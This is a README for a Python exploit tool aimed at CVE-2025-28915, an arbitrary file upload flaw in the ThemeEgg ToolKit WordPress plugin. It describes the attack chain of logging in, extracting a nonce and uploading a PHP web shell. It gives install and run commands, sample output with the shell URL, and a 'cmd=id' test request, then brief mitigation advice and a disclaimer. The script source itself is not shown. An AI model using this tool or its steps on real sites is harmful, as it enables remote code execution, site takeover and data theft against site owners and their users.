# CVE-2025-28915 - WordPress ThemeEgg ToolKit Arbitrary File Upload Exploit

## 📌 Description
An **Unrestricted File Upload** vulnerability in the **ThemeEgg ToolKit** plugin for WordPress (versions **≤ 1.2.9**) allows **authenticated attackers** to upload **web shells** to the server. This can lead to **remote code execution (RCE)**, complete website takeover, and compromise of sensitive data.

- **CVE ID**: [CVE-2025-28915](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-28915)
- **Severity**: 🔴 Critical (CVSS: 9.1)
- **Affected Versions**: ThemeEgg ToolKit **≤ 1.2.9**
- **Attack Vector**: Authenticated, requires WordPress user with sufficient privileges
- **Impact**: Full server compromise, code execution, data exfiltration

---

## 🔥 Exploit Overview
This script automates the exploitation of **CVE-2025-28915** by:
1. **Checking the plugin version** to confirm vulnerability.
2. **Logging in to WordPress** using provided credentials.
3. **Extracting security nonce** required for authentication.
4. **Uploading a PHP Web Shell** via the vulnerable endpoint.
5. **Providing the shell URL** for post-exploitation.

---

## 🚀 Usage

### **Prerequisites:**
- Python 3.x
- `requests`, `beautifulsoup4`

### **Installation:**
```bash
pip install requests beautifulsoup4
```

### **Command Example:**
```bash
python CVE-2025-28915.py -u http://192.168.100.74:888/wordpress -un admin -p password123
```

### **Arguments:**
| Argument   | Description |
|------------|-------------|
| `-u` | Target WordPress URL (e.g., `http://target.com/wordpress`) |
| `-un` | WordPress username |
| `-p` | WordPress password |

---

## 🎯 Exploit Output Example
```plaintext
[+] Vulnerable version detected: 1.2.9
[+] Logged in successfully.
[+] Found security nonce: f82467a997
[*] Uploading Web Shell...
[+] Web Shell uploaded successfully!
[+] Potential Web Shell location: http://target.com/wp-content/uploads/2025/03/shell.php
[*] Test command: http://target.com/wp-content/uploads/2025/03/shell.php?cmd=id
```

---

## ⚠️ Mitigation
- **Upgrade** ThemeEgg ToolKit to a patched version (>1.2.9).
- **Restrict file uploads** to allow only necessary file types.
- **Implement security plugins** that block unauthorized file uploads.
- **Monitor logs** for suspicious activity.

---

## 📜 Legal Disclaimer
**This script is for educational and authorized security testing purposes only. Unauthorized use is illegal and unethical. The author assumes no liability for misuse.** 

*By: Khaled Alenazi (Nxploit)*
